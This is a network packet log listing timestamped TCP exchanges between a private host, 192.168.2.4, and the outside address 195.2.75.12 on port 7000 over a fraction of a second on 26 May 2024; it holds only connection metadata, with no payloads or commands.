May 26, 2024 01:21:26.968916893 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.969222069 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.969293118 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.969309092 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.969683886 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.969702005 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.969767094 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.969799995 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.969830036 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.970503092 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.970586061 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.970912933 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.970976114 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.971014023 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.971070051 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.971215010 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.971338034 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.971398115 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.972003937 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.972050905 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.972219944 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.972276926 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.975913048 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.975956917 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.976140022 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.994946003 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.995021105 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.995131969 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.995326996 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.995399952 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.995433092 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.995685101 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.995884895 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.995946884 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.998775005 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.998790979 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.998845100 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.998902082 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.998919010 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.998954058 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.999635935 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.999762058 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.999831915 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:26.999912977 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:26.999964952 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.000056028 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.000272036 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.000287056 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.000340939 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.000655890 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.000710964 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.000776052 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.000940084 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.001430988 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.001446962 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.001490116 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.001523018 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.001554012 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.002188921 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.002278090 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.002376080 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.002474070 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.002559900 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.002978086 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.003082037 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.003258944 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.003422022 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.003536940 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.003552914 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.003607988 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.004012108 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.004069090 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.004144907 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.004271030 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.004482985 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.004535913 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.004816055 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.004869938 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.004897118 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.005537987 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.005652905 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.005733967 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.005811930 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.005865097 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.006295919 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.006397009 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.007385969 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.009208918 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.031527996 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.031543016 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.031831980 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.031852961 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.031992912 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.032136917 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.032624960 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.032639980 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.032741070 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.032776117 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.032823086 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.035449982 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.035465956 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.035481930 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.035562992 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.035692930 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.035748005 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.035887957 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.036423922 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.036439896 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.036497116 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.036613941 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.036673069 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.037205935 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.037446976 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.037463903 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.037554979 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.037560940 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.037610054 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.037755013 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.037770987 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.037832975 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.038183928 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.038284063 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.038522959 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.038583994 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.038655996 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.038706064 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.039150953 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.039167881 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.039228916 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.039244890 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.039453983 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.039609909 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.040096998 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.040276051 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.040400982 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.040416956 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.040462017 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.040498018 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.041052103 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.041166067 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.041233063 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.041284084 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.041300058 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.041368961 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.041490078 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.042067051 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.042131901 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.042196989 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.042344093 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.042401075 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.042964935 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.043071032 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.043883085 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.046237946 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.052355051 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.052429914 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.052509069 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.052644014 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.052660942 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.052706957 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.053400040 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.053481102 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.053519964 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.053682089 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.053736925 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.057074070 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.058942080 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.059020042 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.059133053 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.059226036 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.059356928 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.059889078 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.059904099 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.059952021 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.059963942 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.060137987 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.060189962 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.060719967 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.060736895 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.060816050 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.060822964 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.061602116 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.061671019 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.061717033 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.061903000 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.061955929 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.062058926 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.062517881 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.062623978 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.062648058 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.063389063 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.063462973 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.063488007 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.063652039 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.063704967 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.064270973 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.066802025 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.066817999 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.066874027 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.085880041 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.085896015 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.086152077 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.086266994 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.086333990 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.086397886 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.086586952 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.086644888 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.086791039 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.089827061 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.089843035 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.089898109 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.089926958 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.089942932 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.089982033 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.090154886 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.090209961 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.090348005 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.090574026 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.090629101 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.090755939 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.091054916 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.091108084 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.091171980 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.091875076 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.091948032 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.091994047 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.092123985 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.092178106 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.092781067 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.092881918 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.092933893 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.093061924 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.093667984 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.093683958 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.093739033 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.093777895 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.093831062 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.094620943 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.094734907 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.094799995 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.095134020 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.095215082 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.095267057 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.095390081 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.095561981 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.095624924 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.095984936 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.096088886 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.096141100 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.096899033 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.097024918 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.097078085 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.097321987 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.098707914 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.098773956 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.098792076 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.098988056 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.099004984 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.099020958 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.099039078 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.099076033 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.100287914 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.132086039 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.132282972 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.132397890 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.132425070 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.132616997 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.133256912 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.133282900 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.133301020 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.133467913 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.133575916 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.133640051 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.134092093 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.134183884 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.134201050 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.134259939 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.134716034 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.134787083 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.134829998 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.135202885 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.135266066 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.135298967 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.135539055 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.135596037 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.136095047 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.136112928 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.136183023 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.136224031 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.136977911 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.137046099 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.137082100 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.137243032 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.137295961 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.137880087 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.137969017 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.138170958 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.138212919 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.138741016 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.138811111 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.138849020 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.139024973 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.139076948 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.139698029 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.139707088 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.139772892 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.139791012 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.140541077 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.140607119 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.140633106 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.140819073 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.140872002 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.141412020 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.141524076 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.141582966 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.141694069 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.141841888 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.141895056 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.142322063 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.142474890 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.142539978 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.143214941 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.146568060 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.146591902 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.146627903 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.147145987 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.147171974 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.147309065 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.147311926 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.147408009 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.147447109 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.147675037 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.147731066 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.147769928 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.147788048 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.147835970 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.150085926 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.150101900 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.150162935 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.150391102 CEST	7000	49730	195.2.75.12	192.168.2.4
